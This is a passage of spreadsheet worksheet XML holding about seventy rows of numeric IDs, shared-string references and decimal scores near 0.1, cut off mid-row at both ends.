      <c r="E13326" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13326" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="13327" ht="15.75" customHeight="1">
      <c r="A13327" s="1">
        <v>26556.0</v>
      </c>
      <c r="B13327" s="2">
        <v>1.7800527E7</v>
      </c>
      <c r="C13327" s="2" t="s">
        <v>12821</v>
      </c>
      <c r="D13327" s="2">
        <v>1.0</v>
      </c>
      <c r="E13327" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13327" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="13328" ht="15.75" customHeight="1">
      <c r="A13328" s="1">
        <v>26861.0</v>
      </c>
      <c r="B13328" s="2">
        <v>1.9035839E7</v>
      </c>
      <c r="C13328" s="2" t="s">
        <v>12822</v>
      </c>
      <c r="D13328" s="2">
        <v>1.0</v>
      </c>
      <c r="E13328" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13328" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="13329" ht="15.75" customHeight="1">
      <c r="A13329" s="1">
        <v>27434.0</v>
      </c>
      <c r="B13329" s="2">
        <v>2.1920157E7</v>
      </c>
      <c r="C13329" s="2" t="s">
        <v>12823</v>
      </c>
      <c r="D13329" s="2">
        <v>1.0</v>
      </c>
      <c r="E13329" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13329" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="13330" ht="15.75" customHeight="1">
      <c r="A13330" s="1">
        <v>27973.0</v>
      </c>
      <c r="B13330" s="2">
        <v>2.3995613E7</v>
      </c>
      <c r="C13330" s="2" t="s">
        <v>12824</v>
      </c>
      <c r="D13330" s="2">
        <v>1.0</v>
      </c>
      <c r="E13330" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13330" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="13331" ht="15.75" customHeight="1">
      <c r="A13331" s="1">
        <v>28311.0</v>
      </c>
      <c r="B13331" s="2">
        <v>2.568476E7</v>
      </c>
      <c r="C13331" s="5" t="s">
        <v>12825</v>
      </c>
      <c r="D13331" s="2">
        <v>1.0</v>
      </c>
      <c r="E13331" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13331" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="13332" ht="15.75" customHeight="1">
      <c r="A13332" s="1">
        <v>28879.0</v>
      </c>
      <c r="B13332" s="2">
        <v>2.9170761E7</v>
      </c>
      <c r="C13332" s="2" t="s">
        <v>12826</v>
      </c>
      <c r="D13332" s="2">
        <v>1.0</v>
      </c>
      <c r="E13332" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13332" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="13333" ht="15.75" customHeight="1">
      <c r="A13333" s="1">
        <v>30459.0</v>
      </c>
      <c r="B13333" s="2">
        <v>3.9479225E7</v>
      </c>
      <c r="C13333" s="2" t="s">
        <v>12827</v>
      </c>
      <c r="D13333" s="2">
        <v>1.0</v>
      </c>
      <c r="E13333" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13333" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="13334" ht="15.75" customHeight="1">
      <c r="A13334" s="1">
        <v>30648.0</v>
      </c>
      <c r="B13334" s="2">
        <v>4174659.0</v>
      </c>
      <c r="C13334" s="2" t="s">
        <v>12828</v>
      </c>
      <c r="D13334" s="2">
        <v>1.0</v>
      </c>
      <c r="E13334" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13334" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="13335" ht="15.75" customHeight="1">
      <c r="A13335" s="1">
        <v>30761.0</v>
      </c>
      <c r="B13335" s="2">
        <v>4.4304267E7</v>
      </c>
      <c r="C13335" s="5" t="s">
        <v>12829</v>
      </c>
      <c r="D13335" s="2">
        <v>1.0</v>
      </c>
      <c r="E13335" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13335" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="13336" ht="15.75" customHeight="1">
      <c r="A13336" s="1">
        <v>31465.0</v>
      </c>
      <c r="B13336" s="2">
        <v>5044188.0</v>
      </c>
      <c r="C13336" s="2" t="s">
        <v>12821</v>
      </c>
      <c r="D13336" s="2">
        <v>1.0</v>
      </c>
      <c r="E13336" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13336" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="13337" ht="15.75" customHeight="1">
      <c r="A13337" s="1">
        <v>31576.0</v>
      </c>
      <c r="B13337" s="2">
        <v>5124515.0</v>
      </c>
      <c r="C13337" s="2" t="s">
        <v>12830</v>
      </c>
      <c r="D13337" s="2">
        <v>1.0</v>
      </c>
      <c r="E13337" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13337" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="13338" ht="15.75" customHeight="1">
      <c r="A13338" s="1">
        <v>31886.0</v>
      </c>
      <c r="B13338" s="2">
        <v>5.2866822E7</v>
      </c>
      <c r="C13338" s="2" t="s">
        <v>12831</v>
      </c>
      <c r="D13338" s="2">
        <v>1.0</v>
      </c>
      <c r="E13338" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13338" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="13339" ht="15.75" customHeight="1">
      <c r="A13339" s="1">
        <v>31921.0</v>
      </c>
      <c r="B13339" s="2">
        <v>5304694.0</v>
      </c>
      <c r="C13339" s="2" t="s">
        <v>12832</v>
      </c>
      <c r="D13339" s="2">
        <v>1.0</v>
      </c>
      <c r="E13339" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13339" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="13340" ht="15.75" customHeight="1">
      <c r="A13340" s="1">
        <v>34046.0</v>
      </c>
      <c r="B13340" s="2">
        <v>9577485.0</v>
      </c>
      <c r="C13340" s="2" t="s">
        <v>12833</v>
      </c>
      <c r="D13340" s="2">
        <v>1.0</v>
      </c>
      <c r="E13340" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13340" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="13341" ht="15.75" customHeight="1">
      <c r="A13341" s="1">
        <v>6940.0</v>
      </c>
      <c r="B13341" s="2">
        <v>4.9924088E7</v>
      </c>
      <c r="C13341" s="2" t="s">
        <v>12834</v>
      </c>
      <c r="D13341" s="2">
        <v>1.0</v>
      </c>
      <c r="E13341" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13341" s="2">
        <v>0.1010928961748634</v>
      </c>
    </row>
    <row r="13342" ht="15.75" customHeight="1">
      <c r="A13342" s="1">
        <v>11391.0</v>
      </c>
      <c r="B13342" s="2">
        <v>2.1535916E7</v>
      </c>
      <c r="C13342" s="2" t="s">
        <v>12835</v>
      </c>
      <c r="D13342" s="2">
        <v>1.0</v>
      </c>
      <c r="E13342" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13342" s="2">
        <v>0.1010928961748634</v>
      </c>
    </row>
    <row r="13343" ht="15.75" customHeight="1">
      <c r="A13343" s="1">
        <v>21476.0</v>
      </c>
      <c r="B13343" s="2">
        <v>2.2972406E7</v>
      </c>
      <c r="C13343" s="2" t="s">
        <v>12836</v>
      </c>
      <c r="D13343" s="2">
        <v>1.0</v>
      </c>
      <c r="E13343" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13343" s="2">
        <v>0.1010928961748634</v>
      </c>
    </row>
    <row r="13344" ht="15.75" customHeight="1">
      <c r="A13344" s="1">
        <v>25072.0</v>
      </c>
      <c r="B13344" s="2">
        <v>1.2875988E7</v>
      </c>
      <c r="C13344" s="2" t="s">
        <v>12837</v>
      </c>
      <c r="D13344" s="2">
        <v>1.0</v>
      </c>
      <c r="E13344" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13344" s="2">
        <v>0.1010928961748634</v>
      </c>
    </row>
    <row r="13345" ht="15.75" customHeight="1">
      <c r="A13345" s="1">
        <v>33516.0</v>
      </c>
      <c r="B13345" s="2">
        <v>8085608.0</v>
      </c>
      <c r="C13345" s="2" t="s">
        <v>12838</v>
      </c>
      <c r="D13345" s="2">
        <v>1.0</v>
      </c>
      <c r="E13345" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13345" s="2">
        <v>0.1010928961748634</v>
      </c>
    </row>
    <row r="13346" ht="15.75" customHeight="1">
      <c r="A13346" s="1">
        <v>17741.0</v>
      </c>
      <c r="B13346" s="2">
        <v>5.0680936E7</v>
      </c>
      <c r="C13346" s="2" t="s">
        <v>12839</v>
      </c>
      <c r="D13346" s="2">
        <v>1.0</v>
      </c>
      <c r="E13346" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13346" s="2">
        <v>0.1007532956685499</v>
      </c>
    </row>
    <row r="13347" ht="15.75" customHeight="1">
      <c r="A13347" s="1">
        <v>9389.0</v>
      </c>
      <c r="B13347" s="2">
        <v>5.5743421E7</v>
      </c>
      <c r="C13347" s="2" t="s">
        <v>12840</v>
      </c>
      <c r="D13347" s="2">
        <v>1.0</v>
      </c>
      <c r="E13347" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13347" s="2">
        <v>0.1003898635477583</v>
      </c>
    </row>
    <row r="13348" ht="15.75" customHeight="1">
      <c r="A13348" s="1">
        <v>26939.0</v>
      </c>
      <c r="B13348" s="2">
        <v>1.9534604E7</v>
      </c>
      <c r="C13348" s="2" t="s">
        <v>12841</v>
      </c>
      <c r="D13348" s="2">
        <v>1.0</v>
      </c>
      <c r="E13348" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13348" s="2">
        <v>0.1003898635477583</v>
      </c>
    </row>
    <row r="13349" ht="15.75" customHeight="1">
      <c r="A13349" s="1">
        <v>1131.0</v>
      </c>
      <c r="B13349" s="2">
        <v>2.4188227E7</v>
      </c>
      <c r="C13349" s="2" t="s">
        <v>12842</v>
      </c>
      <c r="D13349" s="2">
        <v>1.0</v>
      </c>
      <c r="E13349" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13349" s="2">
        <v>0.1001984126984127</v>
      </c>
    </row>
    <row r="13350" ht="15.75" customHeight="1">
      <c r="A13350" s="1">
        <v>2316.0</v>
      </c>
      <c r="B13350" s="2">
        <v>3.286149E7</v>
      </c>
      <c r="C13350" s="2" t="s">
        <v>12843</v>
      </c>
      <c r="D13350" s="2">
        <v>1.0</v>
      </c>
      <c r="E13350" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13350" s="2">
        <v>0.1001984126984127</v>
      </c>
    </row>
    <row r="13351" ht="15.75" customHeight="1">
      <c r="A13351" s="1">
        <v>16129.0</v>
      </c>
      <c r="B13351" s="2">
        <v>4.551252E7</v>
      </c>
      <c r="C13351" s="2" t="s">
        <v>12844</v>
      </c>
      <c r="D13351" s="2">
        <v>1.0</v>
      </c>
      <c r="E13351" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13351" s="2">
        <v>0.1001984126984127</v>
      </c>
    </row>
    <row r="13352" ht="15.75" customHeight="1">
      <c r="A13352" s="1">
        <v>18623.0</v>
      </c>
      <c r="B13352" s="2">
        <v>5.3355492E7</v>
      </c>
      <c r="C13352" s="2" t="s">
        <v>12845</v>
      </c>
      <c r="D13352" s="2">
        <v>1.0</v>
      </c>
      <c r="E13352" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13352" s="2">
        <v>0.1001984126984127</v>
      </c>
    </row>
    <row r="13353" ht="15.75" customHeight="1">
      <c r="A13353" s="1">
        <v>20286.0</v>
      </c>
      <c r="B13353" s="2">
        <v>1.1190146E7</v>
      </c>
      <c r="C13353" s="2" t="s">
        <v>12846</v>
      </c>
      <c r="D13353" s="2">
        <v>1.0</v>
      </c>
      <c r="E13353" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13353" s="2">
        <v>0.1001984126984127</v>
      </c>
    </row>
    <row r="13354" ht="15.75" customHeight="1">
      <c r="A13354" s="1">
        <v>29326.0</v>
      </c>
      <c r="B13354" s="2">
        <v>3.1314271E7</v>
      </c>
      <c r="C13354" s="2" t="s">
        <v>12847</v>
      </c>
      <c r="D13354" s="2">
        <v>1.0</v>
      </c>
      <c r="E13354" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13354" s="2">
        <v>0.09999999999999999</v>
      </c>
    </row>
    <row r="13355" ht="15.75" customHeight="1">
      <c r="A13355" s="1">
        <v>28616.0</v>
      </c>
      <c r="B13355" s="2">
        <v>2.7157573E7</v>
      </c>
      <c r="C13355" s="2" t="s">
        <v>12848</v>
      </c>
      <c r="D13355" s="2">
        <v>1.0</v>
      </c>
      <c r="E13355" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13355" s="2">
        <v>0.09999999999999998</v>
      </c>
    </row>
    <row r="13356" ht="15.75" customHeight="1">
      <c r="A13356" s="1">
        <v>2249.0</v>
      </c>
      <c r="B13356" s="2">
        <v>3.2356581E7</v>
      </c>
      <c r="C13356" s="2" t="s">
        <v>12849</v>
      </c>
      <c r="D13356" s="2">
        <v>1.0</v>
      </c>
      <c r="E13356" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13356" s="2">
        <v>0.09999999999999996</v>
      </c>
    </row>
    <row r="13357" ht="15.75" customHeight="1">
      <c r="A13357" s="1">
        <v>23540.0</v>
      </c>
      <c r="B13357" s="2">
        <v>5953885.0</v>
      </c>
      <c r="C13357" s="2" t="s">
        <v>12850</v>
      </c>
      <c r="D13357" s="2">
        <v>1.0</v>
      </c>
      <c r="E13357" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13357" s="2">
        <v>0.09999999999999996</v>
      </c>
    </row>
    <row r="13358" ht="15.75" customHeight="1">
      <c r="A13358" s="1">
        <v>6366.0</v>
      </c>
      <c r="B13358" s="2">
        <v>4.8376597E7</v>
      </c>
      <c r="C13358" s="2" t="s">
        <v>12851</v>
      </c>
      <c r="D13358" s="2">
        <v>1.0</v>
      </c>
      <c r="E13358" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13358" s="2">
        <v>0.09979423868312755</v>
      </c>
    </row>
    <row r="13359" ht="15.75" customHeight="1">
      <c r="A13359" s="1">
        <v>14764.0</v>
      </c>
      <c r="B13359" s="2">
        <v>4.0830907E7</v>
      </c>
      <c r="C13359" s="2" t="s">
        <v>12852</v>
      </c>
      <c r="D13359" s="2">
        <v>1.0</v>
      </c>
      <c r="E13359" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13359" s="2">
        <v>0.09979423868312755</v>
      </c>
    </row>
    <row r="13360" ht="15.75" customHeight="1">
      <c r="A13360" s="1">
        <v>15277.0</v>
      </c>
      <c r="B13360" s="2">
        <v>4.2393035E7</v>
      </c>
      <c r="C13360" s="2" t="s">
        <v>12853</v>
      </c>
      <c r="D13360" s="2">
        <v>1.0</v>
      </c>
      <c r="E13360" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13360" s="2">
        <v>0.09979423868312755</v>
      </c>
    </row>
    <row r="13361" ht="15.75" customHeight="1">
      <c r="A13361" s="1">
        <v>28103.0</v>
      </c>
      <c r="B13361" s="2">
        <v>2.4657323E7</v>
      </c>
      <c r="C13361" s="2" t="s">
        <v>12854</v>
      </c>
      <c r="D13361" s="2">
        <v>1.0</v>
      </c>
      <c r="E13361" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13361" s="2">
        <v>0.09979423868312755</v>
      </c>
    </row>
    <row r="13362" ht="15.75" customHeight="1">
      <c r="A13362" s="1">
        <v>4654.0</v>
      </c>
      <c r="B13362" s="2">
        <v>4.3106595E7</v>
      </c>
      <c r="C13362" s="2" t="s">
        <v>12855</v>
      </c>
      <c r="D13362" s="2">
        <v>1.0</v>
      </c>
      <c r="E13362" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13362" s="2">
        <v>0.09958071278825996</v>
      </c>
    </row>
    <row r="13363" ht="15.75" customHeight="1">
      <c r="A13363" s="1">
        <v>17233.0</v>
      </c>
      <c r="B13363" s="2">
        <v>4.9066306E7</v>
      </c>
      <c r="C13363" s="2" t="s">
        <v>12856</v>
      </c>
      <c r="D13363" s="2">
        <v>1.0</v>
      </c>
      <c r="E13363" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13363" s="2">
        <v>0.09958071278825996</v>
      </c>
    </row>
    <row r="13364" ht="15.75" customHeight="1">
      <c r="A13364" s="1">
        <v>18965.0</v>
      </c>
      <c r="B13364" s="2">
        <v>5.4356442E7</v>
      </c>
      <c r="C13364" s="2" t="s">
        <v>12857</v>
      </c>
      <c r="D13364" s="2">
        <v>1.0</v>
      </c>
      <c r="E13364" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13364" s="2">
        <v>0.09958071278825996</v>
      </c>
    </row>
    <row r="13365" ht="15.75" customHeight="1">
      <c r="A13365" s="1">
        <v>19145.0</v>
      </c>
      <c r="B13365" s="2">
        <v>5.4839127E7</v>
      </c>
      <c r="C13365" s="2" t="s">
        <v>12858</v>
      </c>
      <c r="D13365" s="2">
        <v>1.0</v>
      </c>
      <c r="E13365" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13365" s="2">
        <v>0.09958071278825996</v>
      </c>
    </row>
    <row r="13366" ht="15.75" customHeight="1">
      <c r="A13366" s="1">
        <v>24962.0</v>
      </c>
      <c r="B13366" s="2">
        <v>1.2598405E7</v>
      </c>
      <c r="C13366" s="2" t="s">
        <v>12859</v>
      </c>
      <c r="D13366" s="2">
        <v>1.0</v>
      </c>
      <c r="E13366" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13366" s="2">
        <v>0.09958071278825996</v>
      </c>
    </row>
    <row r="13367" ht="15.75" customHeight="1">
      <c r="A13367" s="1">
        <v>8011.0</v>
      </c>
      <c r="B13367" s="2">
        <v>5.2786827E7</v>
      </c>
      <c r="C13367" s="2" t="s">
        <v>12860</v>
      </c>
      <c r="D13367" s="2">
        <v>1.0</v>
      </c>
      <c r="E13367" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13367" s="2">
        <v>0.09958071278825995</v>
      </c>
    </row>
    <row r="13368" ht="15.75" customHeight="1">
      <c r="A13368" s="1">
        <v>22689.0</v>
      </c>
      <c r="B13368" s="2">
        <v>4.2233083E7</v>
      </c>
      <c r="C13368" s="2" t="s">
        <v>12861</v>
      </c>
      <c r="D13368" s="2">
        <v>1.0</v>
      </c>
      <c r="E13368" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13368" s="2">
        <v>0.09958071278825995</v>
      </c>
    </row>
    <row r="13369" ht="15.75" customHeight="1">
      <c r="A13369" s="1">
        <v>18930.0</v>
      </c>
      <c r="B13369" s="2">
        <v>5.4259669E7</v>
      </c>
      <c r="C13369" s="2" t="s">
        <v>12862</v>
      </c>
      <c r="D13369" s="2">
        <v>1.0</v>
      </c>
      <c r="E13369" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13369" s="2">
        <v>0.09946236559139784</v>
      </c>
    </row>
    <row r="13370" ht="15.75" customHeight="1">
      <c r="A13370" s="1">
        <v>98.0</v>
      </c>
      <c r="B13370" s="2">
        <v>1.2531289E7</v>
      </c>
      <c r="C13370" s="2" t="s">
        <v>12863</v>
      </c>
      <c r="D13370" s="2">
        <v>1.0</v>
      </c>
      <c r="E13370" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13370" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13371" ht="15.75" customHeight="1">
      <c r="A13371" s="1">
        <v>250.0</v>
      </c>
      <c r="B13371" s="2">
        <v>1.5033223E7</v>
      </c>
      <c r="C13371" s="2" t="s">
        <v>12864</v>
      </c>
      <c r="D13371" s="2">
        <v>1.0</v>
      </c>
      <c r="E13371" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13371" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13372" ht="15.75" customHeight="1">
      <c r="A13372" s="1">
        <v>661.0</v>
      </c>
      <c r="B13372" s="2">
        <v>2.012048E7</v>
      </c>
      <c r="C13372" s="2" t="s">
        <v>12865</v>
      </c>
      <c r="D13372" s="2">
        <v>1.0</v>
      </c>
      <c r="E13372" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13372" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13373" ht="15.75" customHeight="1">
      <c r="A13373" s="1">
        <v>1155.0</v>
      </c>
      <c r="B13373" s="2">
        <v>2.4434089E7</v>
      </c>
      <c r="C13373" s="2" t="s">
        <v>12866</v>
      </c>
      <c r="D13373" s="2">
        <v>1.0</v>
      </c>
      <c r="E13373" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13373" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13374" ht="15.75" customHeight="1">
      <c r="A13374" s="1">
        <v>1842.0</v>
      </c>
      <c r="B13374" s="2">
        <v>2.9407283E7</v>
      </c>
      <c r="C13374" s="2" t="s">
        <v>12867</v>
      </c>
      <c r="D13374" s="2">
        <v>1.0</v>
      </c>
      <c r="E13374" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13374" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13375" ht="15.75" customHeight="1">
      <c r="A13375" s="1">
        <v>1854.0</v>
      </c>
      <c r="B13375" s="2">
        <v>2.9491364E7</v>
      </c>
      <c r="C13375" s="2" t="s">
        <v>12868</v>
      </c>
      <c r="D13375" s="2">
        <v>1.0</v>
      </c>
      <c r="E13375" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13375" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13376" ht="15.75" customHeight="1">
      <c r="A13376" s="1">
        <v>2234.0</v>
      </c>
      <c r="B13376" s="2">
        <v>3.2280056E7</v>
      </c>
      <c r="C13376" s="2" t="s">
        <v>12869</v>
      </c>
      <c r="D13376" s="2">
        <v>1.0</v>
      </c>
      <c r="E13376" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13376" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13377" ht="15.75" customHeight="1">
      <c r="A13377" s="1">
        <v>2515.0</v>
      </c>
      <c r="B13377" s="2">
        <v>3.4001642E7</v>
      </c>
      <c r="C13377" s="2" t="s">
        <v>12870</v>
      </c>
      <c r="D13377" s="2">
        <v>1.0</v>
      </c>
      <c r="E13377" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13377" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13378" ht="15.75" customHeight="1">
      <c r="A13378" s="1">
        <v>2747.0</v>
      </c>
      <c r="B13378" s="2">
        <v>3.5032975E7</v>
      </c>
      <c r="C13378" s="2" t="s">
        <v>12871</v>
      </c>
      <c r="D13378" s="2">
        <v>1.0</v>
      </c>
      <c r="E13378" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13378" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13379" ht="15.75" customHeight="1">
      <c r="A13379" s="1">
        <v>2817.0</v>
      </c>
      <c r="B13379" s="2">
        <v>3.5383448E7</v>
      </c>
      <c r="C13379" s="2" t="s">
        <v>12872</v>
      </c>
      <c r="D13379" s="2">
        <v>1.0</v>
      </c>
      <c r="E13379" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13379" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13380" ht="15.75" customHeight="1">
      <c r="A13380" s="1">
        <v>2984.0</v>
      </c>
      <c r="B13380" s="2">
        <v>3.6184373E7</v>
      </c>
      <c r="C13380" s="2" t="s">
        <v>12873</v>
      </c>
      <c r="D13380" s="2">
        <v>1.0</v>
      </c>
      <c r="E13380" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13380" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13381" ht="15.75" customHeight="1">
      <c r="A13381" s="1">
        <v>3088.0</v>
      </c>
      <c r="B13381" s="2">
        <v>3.6654883E7</v>
      </c>
      <c r="C13381" s="2" t="s">
        <v>12874</v>
      </c>
      <c r="D13381" s="2">
        <v>1.0</v>
      </c>
      <c r="E13381" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13381" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13382" ht="15.75" customHeight="1">
      <c r="A13382" s="1">
        <v>3304.0</v>
      </c>
      <c r="B13382" s="2">
        <v>3.7585646E7</v>
      </c>
      <c r="C13382" s="2" t="s">
        <v>12875</v>
      </c>
      <c r="D13382" s="2">
        <v>1.0</v>
      </c>
      <c r="E13382" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13382" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13383" ht="15.75" customHeight="1">
      <c r="A13383" s="1">
        <v>3329.0</v>
      </c>
      <c r="B13383" s="2">
        <v>3.7682621E7</v>
      </c>
      <c r="C13383" s="2" t="s">
        <v>12876</v>
      </c>
      <c r="D13383" s="2">
        <v>1.0</v>
      </c>
      <c r="E13383" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13383" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13384" ht="15.75" customHeight="1">
      <c r="A13384" s="1">
        <v>3756.0</v>
      </c>
      <c r="B13384" s="2">
        <v>3.9741533E7</v>
      </c>
      <c r="C13384" s="2" t="s">
        <v>12877</v>
      </c>
      <c r="D13384" s="2">
        <v>1.0</v>
      </c>
      <c r="E13384" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13384" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13385" ht="15.75" customHeight="1">
      <c r="A13385" s="1">
        <v>4073.0</v>
      </c>
      <c r="B13385" s="2">
        <v>4.1175995E7</v>
      </c>
      <c r="C13385" s="2" t="s">
        <v>12878</v>
      </c>
      <c r="D13385" s="2">
        <v>1.0</v>
      </c>
      <c r="E13385" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13385" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13386" ht="15.75" customHeight="1">
      <c r="A13386" s="1">
        <v>4359.0</v>
      </c>
      <c r="B13386" s="2">
        <v>4.2106803E7</v>
      </c>
      <c r="C13386" s="2" t="s">
        <v>12879</v>
      </c>
      <c r="D13386" s="2">
        <v>1.0</v>
      </c>
      <c r="E13386" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13386" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13387" ht="15.75" customHeight="1">
      <c r="A13387" s="1">
        <v>4373.0</v>
      </c>
      <c r="B13387" s="2">
        <v>4.214336E7</v>
      </c>
      <c r="C13387" s="2" t="s">
        <v>12880</v>
      </c>
      <c r="D13387" s="2">
        <v>1.0</v>
      </c>
      <c r="E13387" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13387" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13388" ht="15.75" customHeight="1">
      <c r="A13388" s="1">
        <v>4557.0</v>
      </c>
      <c r="B13388" s="2">
        <v>4.2704424E7</v>
      </c>
      <c r="C13388" s="2" t="s">
        <v>12881</v>
      </c>
      <c r="D13388" s="2">
        <v>1.0</v>
      </c>
      <c r="E13388" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13388" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13389" ht="15.75" customHeight="1">
      <c r="A13389" s="1">
        <v>4560.0</v>
      </c>
      <c r="B13389" s="2">
        <v>4.2716486E7</v>
      </c>
      <c r="C13389" s="2" t="s">
        <v>12882</v>
      </c>
      <c r="D13389" s="2">
        <v>1.0</v>
      </c>
      <c r="E13389" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13389" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13390" ht="15.75" customHeight="1">
      <c r="A13390" s="1">
        <v>4681.0</v>
      </c>
      <c r="B13390" s="2">
        <v>4.3184224E7</v>
      </c>
      <c r="C13390" s="2" t="s">
        <v>12883</v>
      </c>
      <c r="D13390" s="2">
        <v>1.0</v>
      </c>
      <c r="E13390" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13390" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13391" ht="15.75" customHeight="1">
      <c r="A13391" s="1">
        <v>4688.0</v>
      </c>
      <c r="B13391" s="2">
        <v>4.3218142E7</v>
      </c>
      <c r="C13391" s="2" t="s">
        <v>12884</v>
      </c>
      <c r="D13391" s="2">
        <v>1.0</v>
      </c>
      <c r="E13391" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13391" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13392" ht="15.75" customHeight="1">
      <c r="A13392" s="1">
        <v>5373.0</v>
      </c>
      <c r="B13392" s="2">
        <v>4.5397044E7</v>
      </c>
      <c r="C13392" s="2" t="s">
        <v>12885</v>
      </c>
      <c r="D13392" s="2">
        <v>1.0</v>
      </c>
      <c r="E13392" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13392" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="13393" ht="15.75" customHeight="1">
      <c r="A13393" s="1">
        <v>5500.0</v>
      </c>
      <c r="B13393" s="2">
        <v>4.5814134E7</v>
      </c>
      <c r="C13393" s="2" t="s">
        <v>12886</v>
      </c>
      <c r="D13393" s="2">
        <v>1.0</v>
      </c>
